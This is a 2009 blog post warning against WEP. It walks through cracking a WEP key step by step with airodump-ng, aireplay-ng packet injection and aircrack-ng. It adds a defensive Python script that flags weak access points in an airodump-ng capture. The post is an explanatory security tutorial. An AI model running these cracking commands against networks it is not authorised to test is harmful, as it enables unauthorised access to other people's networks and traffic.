Monday, September 14, 2009

WEP Y?

Wow! It is truly amazing just how many people still use WEP. I'm not going to go on a huge rant about this, but if you are using it, STOP! People often say, "Well, it's better than nothing." I say not really, because it gives you a false sense of security. Others say, "But I don't have anything anyone would want." I say millions of identities are stolen from home computers. Most wireless access points support WPA, so use it. If yours supports WPA2, that is even better. In the "it's better than nothing" category, WPA is the floor, and WPA2 is the best option for home use at this time.

With that in mind, I thought I would show how easy it is to crack WEP with a few simple commands and the right freely available tools.

*Disclaimer: Please remember not to use this for nefarious purposes. This is informational only. Do it on your own access point as a proof of concept or make sure it is in your rules of engagement for a penetration test for a client.*

I will not be held liable for any misuse of this information!

Cracking WEP

1. Download the tools:

BackTrack 4

2. Boot from the disc

3. Find a good target by running the following command:

airodump-ng wlan0 (run airodump-ng by itself to find your interface name; mine happens to be wlan0)

4. Write down the BSSID, ESSID, and channel of the AP with the strongest signal (normally near the top of the list)

5. Lock onto the target with the following command in a new terminal window:

airodump-ng -w wep -c 11 --bssid 00:00:00:00:00:00 wlan0 (here -w wep is the prefix for the capture files written to disk, which is where the .cap file in step 9 comes from; -c is the channel, 11 in this example, but enter the value you saved in step 4; the BSSID will not be all zeros either, so enter the BSSID you wrote down in step 4 in the same colon-separated style as the zeros)

6. Attempt association to the AP with the following command in another terminal window:

aireplay-ng -1 0 -a 00:00:00:00:00:00 wlan0 (again, the BSSID should not be zeros but the value you have from step 4)

7. Hopefully your card supports packet re-injection. This basically means that when it sees some interesting traffic it can recognize, it replays that packet back into the network, which makes this process much faster. Do this step by typing the following in yet another terminal window:

aireplay-ng -3 -b 00:00:00:00:00:00 wlan0 (remember, not zeros but the BSSID from step 4)

8. Once you see the "data" column get to somewhere between 20K and 30K, you should be good to go. Run ls -la to find the name of the capture file that was created. It is the file with the .cap extension.

9. Armed with that information, run the following command to crack the WEP key:

aircrack-ng filename (remember, it should look like wep-02.cap or something else with the .cap extension)

This final step is the quickest. Depending on whether your wireless card supports packet re-injection, it could take a while to capture the traffic needed to crack WEP. If your card is fully supported with re-injection, this will probably take no more than 15 minutes on average. You can run the crack command at random intervals during the capture process to see if you have it yet, though I recommend just waiting until you reach 20-30K data packets. I haven't seen it really work with less than that. Not saying it doesn't, I just haven't seen it.
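Since the point of this post is that WEP should be gone from your own network, here is an added example (my own code, not from the post or the aircrack-ng project) that reads the CSV file airodump-ng writes next to the .cap file from step 5 and flags every access point still running WEP or no encryption. The CSV column layout is assumed from how airodump-ng names its columns, and the sample rows and BSSIDs are constructed, not captured.

```python
"""Audit an airodump-ng CSV export for access points that are still on WEP."""
import csv

# Constructed sample in the airodump-ng CSV layout (placeholder BSSIDs, not a real capture).
# The AP table runs until the first blank line; the station table follows it.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:01, 2009-09-14 10:00:00, 2009-09-14 10:05:00, 11, 54, WEP, WEP, , -40, 120, 25341, 0. 0. 0. 0, 7, HomeNet,
00:11:22:33:44:02, 2009-09-14 10:00:00, 2009-09-14 10:05:00, 6, 54, WPA2, CCMP, PSK, -55, 98, 0, 0. 0. 0. 0, 6, Office,
00:11:22:33:44:03, 2009-09-14 10:00:00, 2009-09-14 10:05:00, 1, 54, OPN, , , -70, 40, 0, 0. 0. 0. 0, 5, Guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
"""

# Strength order used by the audit: open < WEP < WPA < WPA2.
RANK = {"OPN": 0, "WEP": 1, "WPA": 2, "WPA2": 3}


def parse_access_points(text):
    """Return the AP rows as dicts keyed by the header names, stopping at the station table."""
    lines = []
    for line in text.splitlines():
        if not line.strip():
            if lines:          # blank line after the AP table ends it
                break
            continue           # tolerate a leading blank line
        lines.append(line)
    reader = csv.reader(lines, skipinitialspace=True)
    header = [h.strip() for h in next(reader)]
    return [dict(zip(header, (v.strip() for v in row))) for row in reader if row]


def weak_access_points(text, minimum="WPA2"):
    """List (ESSID, BSSID, privacy) for every AP weaker than the required level.

    Mixed-mode APs report e.g. "WPA2 WPA"; the first token is the strongest mode
    offered, which is what the audit grades. An unknown value is treated as open.
    """
    floor = RANK[minimum]
    weak = []
    for ap in parse_access_points(text):
        privacy = ap["Privacy"].split()[0] if ap["Privacy"] else "OPN"
        if RANK.get(privacy, 0) < floor:
            weak.append((ap["ESSID"], ap["BSSID"], privacy))
    return weak


if __name__ == "__main__":
    for essid, bssid, privacy in weak_access_points(SAMPLE_CSV):
        print(f"{essid:20} {bssid}  {privacy:5} -> reconfigure to WPA2")
```

Point it at the wep-01.csv (or similar) written during step 5 of your own capture to confirm your AP no longer shows up in the list.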

So there you have it. Scary, huh? It is. Please remember not to use this for nefarious purposes. This is informational only. Do it on your own access point as a proof of concept, or make sure it is in your rules of engagement for a penetration test for a client. I didn't give you this so you can go cracking your neighbor's wireless connection :)
